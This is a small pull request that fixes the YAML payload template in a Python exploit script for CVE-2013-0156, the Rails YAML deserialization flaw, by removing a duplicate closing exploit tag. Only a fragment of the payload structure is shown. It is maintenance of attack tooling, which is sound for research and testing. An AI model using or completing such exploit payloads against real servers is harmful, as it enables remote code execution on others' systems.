### PR TITLE
Remove extra </exploit> tag in the payload

### DIFF
--- a/ruby/cve-2013-0156/cve-2013-0156.py
+++ b/ruby/cve-2013-0156/cve-2013-0156.py
@@ -21,7 +21,7 @@ yaml = '''
     :action: create
     :controller: foos
   segment_keys:
-    - :format</exploit>
+    - :format
 '''.format(payload)
 
 xml = '''


### PR DESCRIPTION
The payload had double </exploit> tags for single <exploit> tag. This commit removes the duplicate.